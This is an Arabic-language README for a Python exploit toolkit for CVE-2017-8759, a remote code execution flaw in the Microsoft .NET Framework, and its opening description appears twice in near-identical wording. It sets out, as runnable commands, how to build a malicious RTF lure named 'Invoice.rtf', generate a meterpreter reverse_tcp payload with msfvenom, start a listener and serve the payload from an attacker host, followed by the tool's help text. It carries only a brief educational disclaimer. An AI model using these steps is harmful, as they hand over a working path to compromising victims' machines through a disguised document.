
مجموعة أدوات الاستغلال CVE-2017-8759 - الإصدار 1.0 هي سكريبت بايثون عملي يوفر لمختبري الاختراق وباحثي الأمان طريقة سريعة وفعالة لاختبار ثغرة تنفيذ الأوامر عن بُعد (RCE) في Microsoft .NET Framework. يمكنها إنشاء ملف RTF ضار وتوصيل حمولة metasploit / meterpreter / غيرها إلى الضحية دون أي تكوين معقد.
مجموعة أدوات استغلال CVE-2017-8759 - v1.0 هي نص بايثون مفيد يوفر لمختبري الاختراق وباحثي الأمن طريقة سريعة وفعالة لاختبار تنفيذ التعليمات البرمجية عن بعد (RCE) في إطار عمل Microsoft .NET Framework. يمكنه إنشاء ملف RTF ضار وتسليم حمولة metasploit / meterpreter / أي حمولة أخرى للضحية دون أي تكوين معقد.
هذا البرنامج مخصص للأغراض التعليمية فقط. لا تستخدمه دون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة حقيقة أنني (bhdresh) لست مسؤولاً عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. لا يتحمل المؤلف أو أي مزود إنترنت أي مسؤولية عن المحتوى أو سوء استخدام هذه البرامج أو أي مشتقات منها. باستخدام هذا البرنامج، فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس مسؤولية bhdresh.
أخيرًا، هذا تطوير شخصي، يرجى احترام فلسفته وعدم استخدامه للأمور السيئة!
رخصة CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
تم إدخال الإمكانيات التالية في البرنامج النصي
- إنشاء ملف RTF ضار
- وضع الاستغلال للملف RTF الذي تم إنشاؤه
الإصدار: Python version 2.7.13
1) إنشاء ملف RTF ضار
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (اختياري، إذا كنت تستخدم حمولة MSF): إنشاء حمولة metasploit وبدء المعالج
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) بدء مجموعة الأدوات في وضع الاستغلال لتسليم الحمولة المحلية
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
هذه مجموعة أدوات مفيدة لاستغلال CVE-2017-8759 (Microsoft .NET Framework RCE)
الأوضاع:
-M gen إنشاء ملف ضار فقط
إنشاء ملف RTF ضار:
-w <Filename.rtf> اسم ملف RTF الضار (شارك هذا الملف مع الضحية).
-u <http://attacker.com/test.txt> مسار ملف txt البعيد. عادةً، يجب أن يكون هذا نطاقاً أو عنوان IP حيث تعمل هذه الأداة.
على سبيل المثال، http://attackerip.com/test.txt (سيتم تضمين عنوان URL هذا في ملف RTF الضار وسيتم طلبه بمجرد أن يفتح الضحية ملف RTF الضار.
-M exp بدء وضع الاستغلال
الاستغلال:
-p <TCP port:Default 80> رقم المنفذ المحلي.
-e <http://attacker.com/shell.exe> مسار ملف تنفيذي / شيل meterpreter / حمولة يجب تنفيذها على الهدف.
-l </tmp/shell.exe> حدد المسار المحلي لملف تنفيذي / شيل meterpreter / حمولة.
@bhdresh
@Voulnet, @vysec, @bhdresh
من الواضح أنني لست مطورًا بدوام كامل، لذا توقع بعض المشاكل.
يرجى الإبلاغ عن الأخطاء والمشاكل عبر https://github.com/bhdresh/CVE-2017-8759/issues/new